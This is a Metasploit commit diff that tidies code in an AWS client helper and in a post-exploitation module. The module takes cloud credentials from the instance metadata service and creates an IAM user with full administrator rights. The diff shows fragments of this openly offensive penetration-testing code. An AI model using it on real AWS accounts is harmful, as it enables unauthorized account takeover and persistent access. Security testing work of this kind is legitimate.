Merge pull request #1 from jhart-r7/pr/fixup-7604

Initial cleanup for #7604
bug/bundler_fix
godinezj 2016-12-06 22:03:25 -08:00 committed by GitHub
commit 48c9e7dfd5
2 changed files with 40 additions and 31 deletions

View File

@ -6,6 +6,7 @@ module Metasploit
module Client module Client
USER_AGENT = "aws-sdk-ruby2/2.6.27 ruby/2.3.2 x86_64-darwin15" USER_AGENT = "aws-sdk-ruby2/2.6.27 ruby/2.3.2 x86_64-darwin15"
include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpClient
# because Post modules require these to be defined when including HttpClient # because Post modules require these to be defined when including HttpClient
def register_autofilter_ports(ports=[]); end def register_autofilter_ports(ports=[]); end
def register_autofilter_hosts(ports=[]); end def register_autofilter_hosts(ports=[]); end
@ -48,7 +49,7 @@ module Metasploit
if headers.nil? || !headers.instance_of?(Hash) || body_digest.nil? || !body_digest.instance_of?(String) if headers.nil? || !headers.instance_of?(Hash) || body_digest.nil? || !body_digest.instance_of?(String)
return nil, nil return nil, nil
end end
headers_block = headers.sort_by(&:first).map do |k,v| headers_block = headers.sort_by(&:first).map do |k, v|
v = "#{v},#{v}" if k == 'Host' v = "#{v},#{v}" if k == 'Host'
"#{k.downcase}:#{v}" "#{k.downcase}:#{v}"
end.join("\n") end.join("\n")
@ -76,8 +77,8 @@ module Metasploit
def body(vars_post) def body(vars_post)
pstr = "" pstr = ""
vars_post.each_pair do |var,val| vars_post.each_pair do |var, val|
pstr << '&' if pstr.length > 0 pstr << '&' unless pstr.empty?
pstr << var pstr << var
pstr << '=' pstr << '='
pstr << val pstr << val
@ -106,7 +107,7 @@ module Metasploit
def print_hsh(hsh) def print_hsh(hsh)
return if hsh.nil? || !hsh.instance_of?(Hash) return if hsh.nil? || !hsh.instance_of?(Hash)
hsh.each do |key, value| hsh.each do |key, value|
print_warning "#{key}: #{value}" vprint_status "#{key}: #{value}"
end end
end end

View File

@ -1,3 +1,8 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core' require 'msf/core'
require 'metasploit/framework/aws/client' require 'metasploit/framework/aws/client'
@ -5,42 +10,46 @@ class MetasploitModule < Msf::Post
include Metasploit::Framework::Aws::Client include Metasploit::Framework::Aws::Client
def initialize(info={}) def initialize(info = {})
super(update_info(info, super(
'Name' => "Create an AWS IAM User", update_info(
'Description' => %q{ info,
This module will attempt to create an AWS (Amazon Web Services) IAM 'Name' => "Create an AWS IAM User",
(Identity and Access Management) user with Admin privileges. 'Description' => %q{
}, This module will attempt to create an AWS (Amazon Web Services) IAM
'License' => MSF_LICENSE, (Identity and Access Management) user with Admin privileges.
'Platform' => %w(unix), },
'SessionTypes' => %w(shell meterpreter), 'License' => MSF_LICENSE,
'Author' => ['Javier Godinez <godinezj[at]gmail.com>'], 'Platform' => %w(unix),
'References' => [ 'SessionTypes' => %w(shell meterpreter),
[ 'URL', 'https://github.com/devsecops/bootcamp/raw/master/Week-6/slides/june-DSO-bootcamp-week-six-lesson-three.pdf' ] 'Author' => ['Javier Godinez <godinezj[at]gmail.com>'],
] 'References' => [
)) [ 'URL', 'https://github.com/devsecops/bootcamp/raw/master/Week-6/slides/june-DSO-bootcamp-week-six-lesson-three.pdf' ]
]
)
)
register_options( register_options(
[ [
OptString.new('IAM_USERNAME', [false, 'Name of the user to be created (leave empty or unset to use a random name)', '']),
OptString.new('AccessKeyId', [false, 'AWS access key', '']),
OptString.new('SecretAccessKey', [false, 'AWS secret key', '']),
OptString.new('Token', [false, 'AWS session token', ''])
]
)
register_advanced_options(
[
OptString.new('METADATA_IP', [true, 'The metadata service IP', '169.254.169.254']),
OptString.new('RHOST', [true, 'AWS IAM Endpoint', 'iam.amazonaws.com']), OptString.new('RHOST', [true, 'AWS IAM Endpoint', 'iam.amazonaws.com']),
OptString.new('RPORT', [true, 'AWS IAM Endpoint TCP Port', 443]), OptString.new('RPORT', [true, 'AWS IAM Endpoint TCP Port', 443]),
OptString.new('SSL', [true, 'AWS IAM Endpoint SSL', true]), OptString.new('SSL', [true, 'AWS IAM Endpoint SSL', true]),
OptString.new('IAM_GROUP_POL', [true, 'IAM group policy to use', '{"Version": "2012-10-17", "Statement": [{"Effect": "Allow", "Action": "*", "Resource": "*" }]}']), OptString.new('IAM_GROUP_POL', [true, 'IAM group policy to use', '{"Version": "2012-10-17", "Statement": [{"Effect": "Allow", "Action": "*", "Resource": "*" }]}']),
OptString.new('IAM_USERNAME', [false, 'Username for the user to be created', '']),
OptString.new('Region', [true, 'The default region', 'us-east-1' ]) OptString.new('Region', [true, 'The default region', 'us-east-1' ])
]) ]
register_advanced_options( )
[
OptString.new('METADATA_IP', [true, 'The metadata service IP', '169.254.169.254']),
OptString.new('AccessKeyId', [false, 'AWS access key', '']),
OptString.new('SecretAccessKey', [false, 'AWS secret key', '']),
OptString.new('Token', [false, 'AWS session token', ''])
])
deregister_options('VHOST') deregister_options('VHOST')
end end
def run def run
# setup creds for making IAM API calls # setup creds for making IAM API calls
creds = metadata_creds creds = metadata_creds
@ -58,7 +67,7 @@ class MetasploitModule < Msf::Post
end end
# create user # create user
username = datastore['IAM_USERNAME'].empty? ? Rex::Text.rand_text_alphanumeric(16) : datastore['IAM_USERNAME'] username = datastore['IAM_USERNAME'].blank? ? Rex::Text.rand_text_alphanumeric(16) : datastore['IAM_USERNAME']
print_status("Creating user: #{username}") print_status("Creating user: #{username}")
action = 'CreateUser' action = 'CreateUser'
doc = call_iam(creds, 'Action' => action, 'UserName' => username) doc = call_iam(creds, 'Action' => action, 'UserName' => username)
@ -119,4 +128,3 @@ class MetasploitModule < Msf::Post
{} {}
end end
end end